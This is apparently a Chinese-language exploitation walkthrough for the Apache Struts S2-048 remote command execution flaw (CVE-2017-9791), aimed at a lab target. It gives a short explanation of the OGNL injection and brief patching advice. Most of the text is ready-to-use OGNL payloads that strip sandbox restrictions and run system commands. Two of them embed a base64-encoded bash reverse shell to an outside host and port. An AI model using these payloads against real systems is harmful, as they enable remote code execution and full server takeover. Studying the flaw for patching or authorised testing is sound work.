S2-048 CVE-2017-9791 远程命令执行
漏洞名称S2-048 CVE-2017-9791 远程命令执行
利用条件
Struts 2.3.x
开启Struts 1 plugin and Struts 1 action插件
漏洞原理
漏洞产生的原因是将用户可控的值添加到 ActionMessage 并在客户前端展示,导致其进入 getText 函数,最后 message 被当作 ognl 表达式执行所以访问 /integration/saveGangster.action;并构造payload检测。
漏洞利用
漏洞探测
https://img2023.cnblogs.com/blog/2783507/202301/2783507-20230110163027927-1282592647.png
触发OGNL表达式的位置是Gangster Name这个表单
输入${33*3}即可查看执行结果(剩下两个表单随意填写)
https://img2023.cnblogs.com/blog/2783507/202301/2783507-20230110163028434-1581286678.png
漏洞利用
命令执行
poc1
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('whoami').getInputStream())).(#q)}https://img2023.cnblogs.com/blog/2783507/202301/2783507-20230110163028848-1895131466.png
https://img2023.cnblogs.com/blog/2783507/202301/2783507-20230110163029259-1638736623.png
poc2
适用于windows,linux
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='id').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}在线URLEncode编码,URLDecode解码工具 - UU在线工具 (uutool.cn)
https://img2023.cnblogs.com/blog/2783507/202301/2783507-20230110163029620-1366216151.png
通过burp特殊字符编码皆执行
https://img2023.cnblogs.com/blog/2783507/202301/2783507-20230110163029943-1384759708.png
漏洞检测脚本
GitHub - dragoneeg/Struts2-048: CVE-2017-9791
https://img2023.cnblogs.com/blog/2783507/202301/2783507-20230110163030318-696250022.png
获取shell
poc1
生成base64 生成shell Online - Reverse Shell Generator (revshells.com)放入base64
bash -c {echo,L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguNTYuMjAwLzEyMzQgMD4mMQ==}|{base64,-d}|{bash,-i}%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('bash -c {echo,L2Jpbi9iYXNoIC1pID4gL2Rldi90Y3AvMTkyLjE2OC41Ni4yMDAvMTIzNCAwPCYgMj4mMQ==}|{base64,-d}|{bash,-i}').getInputStream())).(#q)}在线URLEncode编码,URLDecode解码工具 - UU在线工具 (uutool.cn)
https://img2023.cnblogs.com/blog/2783507/202301/2783507-20230110163030651-422729540.png
https://img2023.cnblogs.com/blog/2783507/202301/2783507-20230110163030978-1468730312.png
poc2
{echo,L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguNTYuMjAwLzEyMzQgMD4mMQ==}|{base64,-d}|{bash,-i}%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='{echo,L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguNTYuMjAwLzEyMzQgMD4mMQ==}|{base64,-d}|{bash,-i}').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}https://img2023.cnblogs.com/blog/2783507/202301/2783507-20230110163031319-126861883.png
https://img2023.cnblogs.com/blog/2783507/202301/2783507-20230110163031660-923886878.png
使用脚本进行反弹shell
GitHub - dragoneeg/Struts2-048: CVE-2017-9791
https://img2023.cnblogs.com/blog/2783507/202301/2783507-20230110163032050-473388966.png
https://img2023.cnblogs.com/blog/2783507/202301/2783507-20230110163032398-1122545003.png
修复建议
[*]升级Apache Struts到2.5.10.1最新版本。
[*]避免使用Apache struts2-struts1-plugin这个插件。非必要的情况下可以将Apache struts2-struts1-plugin-2.3.x.jar文件从 “/WEB-INF/lib”目录中直接删除。如果使用该插件时避免使用拼接的方式将原始消息直接传递给ActionMessage。
参考文章
https://www.sohu.com/a/155896552_128736
https://si1ent.xyz/2021/02/26/Struts2漏洞汇总/
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
页:
[1]